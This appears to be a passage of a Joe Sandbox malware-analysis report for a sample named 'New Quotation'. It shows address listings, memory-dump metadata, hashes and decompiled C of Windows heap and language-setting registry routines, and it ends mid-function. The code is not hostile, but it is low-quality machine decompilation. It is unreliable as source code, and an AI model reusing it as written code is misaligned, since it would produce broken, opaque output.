                                                                                                                                                                                          0x1d80911b
                                                                                                                                                                                          0x1d80911b
                                                                                                                                                                                          0x1d80911f
                                                                                                                                                                                          0x1d845b41
                                                                                                                                                                                          0x1d845b49
                                                                                                                                                                                          0x1d845b4a
                                                                                                                                                                                          0x1d845b52
                                                                                                                                                                                          0x1d845b56
                                                                                                                                                                                          0x1d845b5a
                                                                                                                                                                                          0x1d80916e
                                                                                                                                                                                          0x1d80916e
                                                                                                                                                                                          0x1d809172
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809174
                                                                                                                                                                                          0x1d809178
                                                                                                                                                                                          0x1d80917a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80917a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80911f
                                                                                                                                                                                          0x1d809119
                                                                                                                                                                                          0x1d80906f
                                                                                                                                                                                          0x1d809073
                                                                                                                                                                                          0x1d809081
                                                                                                                                                                                          0x1d845a91
                                                                                                                                                                                          0x1d845a95
                                                                                                                                                                                          0x1d845a9c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d845aac
                                                                                                                                                                                          0x1d845ab0
                                                                                                                                                                                          0x1d845ab2
                                                                                                                                                                                          0x1d845aba
                                                                                                                                                                                          0x1d845aba
                                                                                                                                                                                          0x1d845abf
                                                                                                                                                                                          0x1d845abf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d809081
                                                                                                                                                                                          0x1d80906d
                                                                                                                                                                                          0x1d845a56
                                                                                                                                                                                          0x1d845a5c
                                                                                                                                                                                          0x1d845a6a
                                                                                                                                                                                          0x1d845a70
                                                                                                                                                                                          0x1d809136
                                                                                                                                                                                          0x1d80913d
                                                                                                                                                                                          0x1d80913e
                                                                                                                                                                                          0x1d80913f
                                                                                                                                                                                          0x1d80914a
                                                                                                                                                                                          0x1d80914a

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: %$&$@
                                                                                                                                                                                          • API String ID: 0-1537733988
                                                                                                                                                                                          • Opcode ID: 73c5c13e67511ef3fcac6782f23cba85ac3bf18f0f017df02e8161f4511d0962
                                                                                                                                                                                          • Instruction ID: ec5b84393dd1fe417440e0c21a2a104bd47bf0ccab7951fc51a801f37c90ea34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 73c5c13e67511ef3fcac6782f23cba85ac3bf18f0f017df02e8161f4511d0962
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3671BE746083469FC700EF24C980A1BBBE6BFC8618F198A1DF59A472A1D734E905CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 28%
                                                                                                                                                                                          			E1D7E096B(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				void* _t119;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				void* _t124;
				signed int _t125;
				void* _t132;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				 *((intOrPtr*)(_t111 + 0x10)) = _t111 + 0x18;
				_t141 = _t111 - 8;
				 *(_t111 + 0x14) = _a8;
				_push("true");
				_pop(_t72);
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(0);
						_push(0);
						_push(__edx);
						_push(_t141);
						_t132 = 3;
						E1D895FED(_t132, _t134);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1d8c6960 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E1D7CB910();
					__eflags =  *0x1d8c5da8;
					if(__eflags == 0) {
						E1D88FC95(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t80 = _t111 + 8;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t136 + 4)));
							_push(_t118);
							_t119 = 0xd;
							E1D895FED(_t119, 0);
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x208)) =  *((intOrPtr*)(_t140 + 0x208)) + 1;
						if( *((intOrPtr*)(_t140 + 0x208)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1d8c6934 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1d8c6934 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1fc)) =  *((intOrPtr*)(_t140 + 0x1fc)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					}
					_t90 = E1D7E0ACE(_t111, _t135);
					_t123 =  *((intOrPtr*)(_t90 + 4));
					if( *_t123 != _t90) {
						_push(0);
						_push( *_t123);
						_push(0);
						_push(_t90);
						_t124 = 0xd;
						E1D895FED(_t124, 0);
					} else {
						 *_t111 = _t90;
						 *((intOrPtr*)(_t111 + 4)) = _t123;
						 *_t123 = _t111;
						 *((intOrPtr*)(_t90 + 4)) = _t111;
					}
					_t139 =  *(_t140 + 0xb8);
					if(_t139 != 0) {
						_t93 =  *(_t111 + 0x14) >> 0xc;
						while(1) {
							__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
							if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
								break;
							}
							_t125 =  *_t139;
							__eflags = _t125;
							if(_t125 == 0) {
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								L36:
								E1D7D1B5D(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
								goto L12;
							}
							_t139 = _t125;
						}
						goto L36;
					} else {
						goto L12;
					}
				}
			}

































                                                                                                                                                                                          0x1d7e0974
                                                                                                                                                                                          0x1d7e0979
                                                                                                                                                                                          0x1d7e097b
                                                                                                                                                                                          0x1d7e0983
                                                                                                                                                                                          0x1d7e0986
                                                                                                                                                                                          0x1d7e098c
                                                                                                                                                                                          0x1d7e098f
                                                                                                                                                                                          0x1d7e0991
                                                                                                                                                                                          0x1d7e0992
                                                                                                                                                                                          0x1d7e0998
                                                                                                                                                                                          0x1d7e099b
                                                                                                                                                                                          0x1d7e099f
                                                                                                                                                                                          0x1d7e09a4
                                                                                                                                                                                          0x1d7e0a86
                                                                                                                                                                                          0x1d7e0a87
                                                                                                                                                                                          0x1d7e0a8a
                                                                                                                                                                                          0x1d7e0a8f
                                                                                                                                                                                          0x1d7e0a95
                                                                                                                                                                                          0x1d7e0a97
                                                                                                                                                                                          0x1d7e0a99
                                                                                                                                                                                          0x1d7e0a9a
                                                                                                                                                                                          0x1d7e0a9d
                                                                                                                                                                                          0x1d7e0a9e
                                                                                                                                                                                          0x1d7e0aa3
                                                                                                                                                                                          0x1d7e0aa3
                                                                                                                                                                                          0x1d7e09aa
                                                                                                                                                                                          0x1d7e09aa
                                                                                                                                                                                          0x1d7e09aa
                                                                                                                                                                                          0x1d7e09b3
                                                                                                                                                                                          0x1d7e09b6
                                                                                                                                                                                          0x1d83511d
                                                                                                                                                                                          0x1d835120
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835126
                                                                                                                                                                                          0x1d83512c
                                                                                                                                                                                          0x1d835130
                                                                                                                                                                                          0x1d83514f
                                                                                                                                                                                          0x1d835154
                                                                                                                                                                                          0x1d835132
                                                                                                                                                                                          0x1d835147
                                                                                                                                                                                          0x1d83514c
                                                                                                                                                                                          0x1d83515a
                                                                                                                                                                                          0x1d83515f
                                                                                                                                                                                          0x1d835164
                                                                                                                                                                                          0x1d83516c
                                                                                                                                                                                          0x1d835175
                                                                                                                                                                                          0x1d835175
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e09bc
                                                                                                                                                                                          0x1d7e09bc
                                                                                                                                                                                          0x1d7e09bc
                                                                                                                                                                                          0x1d7e09bf
                                                                                                                                                                                          0x1d7e09bf
                                                                                                                                                                                          0x1d7e09c5
                                                                                                                                                                                          0x1d7e09c5
                                                                                                                                                                                          0x1d7e09cd
                                                                                                                                                                                          0x1d7e09d7
                                                                                                                                                                                          0x1d7e09dd
                                                                                                                                                                                          0x1d7e09dd
                                                                                                                                                                                          0x1d7e09df
                                                                                                                                                                                          0x1d7e09e4
                                                                                                                                                                                          0x1d7e0a10
                                                                                                                                                                                          0x1d7e0a10
                                                                                                                                                                                          0x1d7e0a15
                                                                                                                                                                                          0x1d7e0ac3
                                                                                                                                                                                          0x1d7e0a1b
                                                                                                                                                                                          0x1d7e0a1b
                                                                                                                                                                                          0x1d7e0a1b
                                                                                                                                                                                          0x1d7e0a1d
                                                                                                                                                                                          0x1d7e0a20
                                                                                                                                                                                          0x1d7e0a23
                                                                                                                                                                                          0x1d7e0a28
                                                                                                                                                                                          0x1d8351c3
                                                                                                                                                                                          0x1d8351c5
                                                                                                                                                                                          0x1d8351c7
                                                                                                                                                                                          0x1d8351cc
                                                                                                                                                                                          0x1d8351cf
                                                                                                                                                                                          0x1d8351d0
                                                                                                                                                                                          0x1d7e0a2e
                                                                                                                                                                                          0x1d7e0a2e
                                                                                                                                                                                          0x1d7e0a30
                                                                                                                                                                                          0x1d7e0a33
                                                                                                                                                                                          0x1d7e0a36
                                                                                                                                                                                          0x1d7e0a36
                                                                                                                                                                                          0x1d7e0a38
                                                                                                                                                                                          0x1d7e0a3b
                                                                                                                                                                                          0x1d7e0a44
                                                                                                                                                                                          0x1d7e0a4a
                                                                                                                                                                                          0x1d7e0a50
                                                                                                                                                                                          0x1d7e0a5d
                                                                                                                                                                                          0x1d8351da
                                                                                                                                                                                          0x1d8351e1
                                                                                                                                                                                          0x1d8351ea
                                                                                                                                                                                          0x1d8351ec
                                                                                                                                                                                          0x1d8351ee
                                                                                                                                                                                          0x1d8351f1
                                                                                                                                                                                          0x1d8351f8
                                                                                                                                                                                          0x1d8351fb
                                                                                                                                                                                          0x1d8351fd
                                                                                                                                                                                          0x1d835203
                                                                                                                                                                                          0x1d835203
                                                                                                                                                                                          0x1d8351fd
                                                                                                                                                                                          0x1d8351e1
                                                                                                                                                                                          0x1d7e0a63
                                                                                                                                                                                          0x1d7e0a6b
                                                                                                                                                                                          0x1d7e0aab
                                                                                                                                                                                          0x1d7e0aab
                                                                                                                                                                                          0x1d7e0a70
                                                                                                                                                                                          0x1d7e0a77
                                                                                                                                                                                          0x1d7e0a7c
                                                                                                                                                                                          0x1d7e0a7c
                                                                                                                                                                                          0x1d7e09e8
                                                                                                                                                                                          0x1d7e09ed
                                                                                                                                                                                          0x1d7e09f2
                                                                                                                                                                                          0x1d83517f
                                                                                                                                                                                          0x1d835181
                                                                                                                                                                                          0x1d835185
                                                                                                                                                                                          0x1d835187
                                                                                                                                                                                          0x1d83518a
                                                                                                                                                                                          0x1d83518b
                                                                                                                                                                                          0x1d7e09f8
                                                                                                                                                                                          0x1d7e09f8
                                                                                                                                                                                          0x1d7e09fa
                                                                                                                                                                                          0x1d7e09fd
                                                                                                                                                                                          0x1d7e09ff
                                                                                                                                                                                          0x1d7e09ff
                                                                                                                                                                                          0x1d7e0a02
                                                                                                                                                                                          0x1d7e0a0a
                                                                                                                                                                                          0x1d835198
                                                                                                                                                                                          0x1d8351a5
                                                                                                                                                                                          0x1d8351a5
                                                                                                                                                                                          0x1d8351a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83519d
                                                                                                                                                                                          0x1d83519f
                                                                                                                                                                                          0x1d8351a1
                                                                                                                                                                                          0x1d8351af
                                                                                                                                                                                          0x1d8351af
                                                                                                                                                                                          0x1d8351b0
                                                                                                                                                                                          0x1d8351b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8351b9
                                                                                                                                                                                          0x1d8351a3
                                                                                                                                                                                          0x1d8351a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0a0a

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 0-1334570610
                                                                                                                                                                                          • Opcode ID: 8ca52343f71107e8aac1666639abacfdd6d87e2ed1a897ea2ce38bc04f6cfe0d
                                                                                                                                                                                          • Instruction ID: 5452266227a64bef5879aa6234c4a2beb76735c09b98eb4c1a733f129f8d51e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ca52343f71107e8aac1666639abacfdd6d87e2ed1a897ea2ce38bc04f6cfe0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9361D171604355EFD71ACF28C880B6ABBB1FF44764F15849AE4898B292D730E941CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CCC68 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E1D7CCC68(void* __ecx, short* __edx, short* _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t58;
				signed int _t73;
				signed short* _t74;
				signed int _t75;
				signed short* _t77;
				signed int _t82;
				short* _t92;
				signed short* _t93;
				short* _t95;
				void* _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t79 = __ecx;
				_t100 = (_t98 & 0xfffffff8) - 0x34;
				_t95 = __edx;
				_v44 = __edx;
				_t77 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t96 = 0xc000000d;
				} else {
					_t92 = _a4;
					if(_t92 == 0) {
						goto L28;
					}
					_t77 = E1D7CD818(__ecx, 0xac);
					if(_t77 == 0) {
						_t96 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1D812A80();
						}
						if(_t77 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t77);
						}
						return _t96;
					}
					E1D818F40(_t77, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t101 = _t100 + 0xc;
					 *_t95 = 0;
					 *_t92 = 0;
					E1D815050(_t79,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v32 = 0;
					_push( &_v36);
					_push(0x20019);
					_v24 = 0x40;
					_push( &_v64);
					_v20 = 0;
					_v16 = 0;
					_t96 = E1D812AB0();
					if(_t96 < 0) {
						goto L6;
					}
					E1D815050(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t96 = E1D7CD64A(_v64,  &_v44,  &_v56, _t77,  &_v48);
					if(_t96 >= 0) {
						if(_v52 != 1) {
							L17:
							_t96 = 0xc0000001;
							goto L6;
						}
						_t58 =  *_t77 & 0x0000ffff;
						_t93 = _t77;
						_t82 = _t58;
						if(_t58 == 0) {
							L19:
							if(_t82 == 0) {
								L23:
								E1D815050(_t82, _t101 + 0x24, _t77);
								if(E1D7F56E0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t83 = _v48;
								 *_v48 = _v56;
								if( *_t93 != 0) {
									E1D815050(_t83, _t101 + 0x24, _t93);
									if(E1D7F56E0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t96 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t82 = _t82 & 0x0000ffff;
							while(_t82 == 0x20) {
								_t93 =  &(_t93[1]);
								_t73 =  *_t93 & 0x0000ffff;
								_t82 = _t73;
								if(_t73 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t26 =  &(_t93[1]); // 0x2
							_t74 = _t26;
							if(_t82 == 0x2c) {
								break;
							}
							_t93 = _t74;
							_t75 =  *_t93 & 0x0000ffff;
							_t82 = _t75;
							if(_t75 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t93 = 0;
						_t93 = _t74;
						_t82 =  *_t74 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                                                                                          0x1d7ccc68
                                                                                                                                                                                          0x1d7ccc70
                                                                                                                                                                                          0x1d7ccc77
                                                                                                                                                                                          0x1d7ccc79
                                                                                                                                                                                          0x1d7ccc7d
                                                                                                                                                                                          0x1d7ccc7f
                                                                                                                                                                                          0x1d7ccc86
                                                                                                                                                                                          0x1d82a26b
                                                                                                                                                                                          0x1d82a26b
                                                                                                                                                                                          0x1d7ccc94
                                                                                                                                                                                          0x1d7ccc94
                                                                                                                                                                                          0x1d7ccc99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ccca9
                                                                                                                                                                                          0x1d7cccad
                                                                                                                                                                                          0x1d82a192
                                                                                                                                                                                          0x1d7ccd59
                                                                                                                                                                                          0x1d7ccd5e
                                                                                                                                                                                          0x1d7ccd60
                                                                                                                                                                                          0x1d7ccd64
                                                                                                                                                                                          0x1d7ccd64
                                                                                                                                                                                          0x1d7ccd6b
                                                                                                                                                                                          0x1d7ccd7a
                                                                                                                                                                                          0x1d7ccd7a
                                                                                                                                                                                          0x1d7ccd87
                                                                                                                                                                                          0x1d7ccd87
                                                                                                                                                                                          0x1d7cccbb
                                                                                                                                                                                          0x1d7cccc0
                                                                                                                                                                                          0x1d7cccc5
                                                                                                                                                                                          0x1d7cccca
                                                                                                                                                                                          0x1d7ccccd
                                                                                                                                                                                          0x1d7cccda
                                                                                                                                                                                          0x1d7ccce3
                                                                                                                                                                                          0x1d7ccceb
                                                                                                                                                                                          0x1d7cccf5
                                                                                                                                                                                          0x1d7cccf9
                                                                                                                                                                                          0x1d7cccfa
                                                                                                                                                                                          0x1d7ccd03
                                                                                                                                                                                          0x1d7ccd0b
                                                                                                                                                                                          0x1d7ccd0c
                                                                                                                                                                                          0x1d7ccd10
                                                                                                                                                                                          0x1d7ccd19
                                                                                                                                                                                          0x1d7ccd1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ccd29
                                                                                                                                                                                          0x1d7ccd2e
                                                                                                                                                                                          0x1d7ccd3d
                                                                                                                                                                                          0x1d7ccd4f
                                                                                                                                                                                          0x1d7ccd53
                                                                                                                                                                                          0x1d82a1a1
                                                                                                                                                                                          0x1d82a1c6
                                                                                                                                                                                          0x1d82a1c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1c6
                                                                                                                                                                                          0x1d82a1a3
                                                                                                                                                                                          0x1d82a1a6
                                                                                                                                                                                          0x1d82a1a8
                                                                                                                                                                                          0x1d82a1ad
                                                                                                                                                                                          0x1d82a1da
                                                                                                                                                                                          0x1d82a1dd
                                                                                                                                                                                          0x1d82a1f5
                                                                                                                                                                                          0x1d82a1fb
                                                                                                                                                                                          0x1d82a211
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a213
                                                                                                                                                                                          0x1d82a21c
                                                                                                                                                                                          0x1d82a224
                                                                                                                                                                                          0x1d82a230
                                                                                                                                                                                          0x1d82a246
                                                                                                                                                                                          0x1d82a263
                                                                                                                                                                                          0x1d82a248
                                                                                                                                                                                          0x1d82a24e
                                                                                                                                                                                          0x1d82a253
                                                                                                                                                                                          0x1d82a253
                                                                                                                                                                                          0x1d82a246
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a224
                                                                                                                                                                                          0x1d82a1df
                                                                                                                                                                                          0x1d82a1e2
                                                                                                                                                                                          0x1d82a1e8
                                                                                                                                                                                          0x1d82a1eb
                                                                                                                                                                                          0x1d82a1ee
                                                                                                                                                                                          0x1d82a1f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1af
                                                                                                                                                                                          0x1d82a1af
                                                                                                                                                                                          0x1d82a1af
                                                                                                                                                                                          0x1d82a1af
                                                                                                                                                                                          0x1d82a1b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1b8
                                                                                                                                                                                          0x1d82a1ba
                                                                                                                                                                                          0x1d82a1bd
                                                                                                                                                                                          0x1d82a1c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1c4
                                                                                                                                                                                          0x1d82a1d2
                                                                                                                                                                                          0x1d82a1d5
                                                                                                                                                                                          0x1d82a1d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a1d7
                                                                                                                                                                                          0x1d7ccd53

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1D7CCCD4
                                                                                                                                                                                          • @, xrefs: 1D7CCD03
                                                                                                                                                                                          • InstallLanguageFallback, xrefs: 1D7CCD1F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                                                          • API String ID: 0-1757540487
                                                                                                                                                                                          • Opcode ID: cb09a30b73ca5340f5ae3debcb094bcaf29c9072936d6488a713cefeb34a9a1f
                                                                                                                                                                                          • Instruction ID: 87ad21143dee0733aa87567dfc699598c2074ddabda04c8c6874c1b1394cbdb1
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb09a30b73ca5340f5ae3debcb094bcaf29c9072936d6488a713cefeb34a9a1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB518EB65087429FC710CF64C440B6BB7E8BF88764F45092AFA89E7250E734E944C7A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88BD08 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E1D88BD08(intOrPtr __ecx, void* __edx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t64;
				void* _t68;
				char* _t75;

				_v8 = _v8 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t64 = 0;
				_v20 = __ecx;
				_v12 = 7;
				if(__ecx == 0) {
					L14:
					_t76 = 0xc000000d;
				} else {
					_t75 = _a4;
					if(_t75 == 0 || _a8 == 0) {
						goto L14;
					} else {
						E1D815050(__ecx,  &_v28, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
						_v52 = 0x18;
						_v44 =  &_v28;
						_v48 = 0;
						_push( &_v52);
						_push(0x20019);
						_v40 = 0x40;
						_push( &_v8);
						_v36 = 0;
						_v32 = 0;
						if(E1D812AB0() >= 0) {
							E1D815050(0,  &_v28, L"PreferredUILanguages");
							_push(0);
							_t68 = E1D7CD64A(_v8,  &_v28,  &_v12, 0,  &_v16);
							_t76 = 0xc0000034;
							if(_t68 == 0xc0000034) {
								goto L4;
							} else {
								_t54 = _v16;
								if(_v16 == 0) {
									goto L4;
								} else {
									if(_t68 == 0x80000005) {
										_t64 = E1D7E5D90(_t68,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t54 + 2);
										if(_t64 != 0) {
											_push(_t68);
											_t76 = E1D7CD64A(_v8,  &_v28,  &_v12, _t64,  &_v16);
											if(_t76 >= 0) {
												if(_v12 == 7 || _v12 == 1) {
													 *_t75 = 0;
													_t76 = L1D7F4CA6(_v20, _t64, _v16 >> 1, 8, 3, 1, _a8);
												} else {
													goto L4;
												}
											}
										} else {
											_t76 = 0xffffffffc0000017;
										}
									}
								}
							}
						} else {
							L4:
							_t76 = 0;
							 *_t75 = 1;
						}
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					E1D812A80();
				}
				if(_t64 != 0) {
